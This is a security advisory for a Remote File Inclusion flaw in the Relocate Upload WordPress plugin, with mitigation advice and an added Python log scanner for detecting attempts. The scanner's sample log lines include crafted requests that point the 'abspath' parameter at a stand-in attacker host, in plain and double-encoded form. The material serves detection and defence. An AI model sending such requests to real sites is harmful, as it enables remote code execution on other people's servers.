Vendor: Relocate Upload Plugin
By: Ben Schmidt
CVSS: 9.3 (HIGH)
Remote File Inclusion (RFI)
CWE: 98
Product Name: Relocate Upload Plugin
Affected Version From: 0.14
Affected Version To: 0.14
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2011
Relocate Upload WordPress plugin RFI
The Relocate Upload WordPress plugin is vulnerable to a Remote File Inclusion (RFI) attack. An attacker can send a malicious request to the relocate-upload.php script using a crafted URL that carries an arbitrary file path in the 'abspath' parameter. This allows the attacker to execute arbitrary code on the vulnerable server.
Mitigation:
The best way to mitigate this vulnerability is to upgrade to the latest version of the Relocate Upload plugin. Additionally, the web server should be configured to only allow requests to the relocate-upload.php script from trusted sources.
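
To check whether the request pattern described above has already reached a server, the following added example (not part of the original advisory or the plugin's code) scans web access logs for requests to relocate-upload.php that set 'abspath'. The combined log format, the `PLUGIN_PATH` placeholder, the sample hosts and the verdict names are assumptions made for the illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample lines (combined log format). PLUGIN_PATH and hosts are placeholders.
SAMPLE_LOG = """\
192.0.2.10 - - [01/Jan/2011:10:00:00 +0000] "GET /PLUGIN_PATH/relocate-upload.php?abspath=http://attacker.example/x HTTP/1.1" 200 512
192.0.2.11 - - [01/Jan/2011:10:00:05 +0000] "GET /PLUGIN_PATH/relocate-upload.php?abspath=http%253A%252F%252Fattacker.example%252Fx HTTP/1.1" 200 512
192.0.2.12 - - [01/Jan/2011:10:00:09 +0000] "GET /PLUGIN_PATH/relocate-upload.php?abspath=/var/www/ HTTP/1.1" 200 90
192.0.2.13 - - [01/Jan/2011:10:00:12 +0000] "GET /index.php?abspath=http://attacker.example/x HTTP/1.1" 404 10
192.0.2.14 - - [01/Jan/2011:10:00:15 +0000] "GET /PLUGIN_PATH/relocate-upload.php HTTP/1.1" 200 90
"""

REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
URL_SCHEME = re.compile(r"^\s*[a-z][a-z0-9+.\-]*://", re.IGNORECASE)

def fully_decode(value, max_rounds=3):
    """Undo nested percent-encoding so double-encoded values cannot hide a scheme."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def scan(log_text):
    """Return (client, verdict, decoded abspath) for each request that sets 'abspath'."""
    findings = []
    for line in log_text.splitlines():
        match = REQUEST.search(line)
        if not match:
            continue
        target = urlsplit(match.group(1))
        # Only the script named in the advisory is of interest.
        if not unquote(target.path).lower().endswith("/relocate-upload.php"):
            continue
        for raw in parse_qs(target.query, keep_blank_values=True).get("abspath", []):
            value = fully_decode(raw)
            verdict = "remote-url" if URL_SCHEME.match(value) else "local-path"
            findings.append((line.split()[0], verdict, value))
    return findings

if __name__ == "__main__":
    for client, verdict, value in scan(SAMPLE_LOG):
        print(f"{client}\t{verdict}\t{value}")
```

Access logs normally record only the query string, so a parameter sent in a POST body will not appear here and needs request-body logging or a WAF rule to observe.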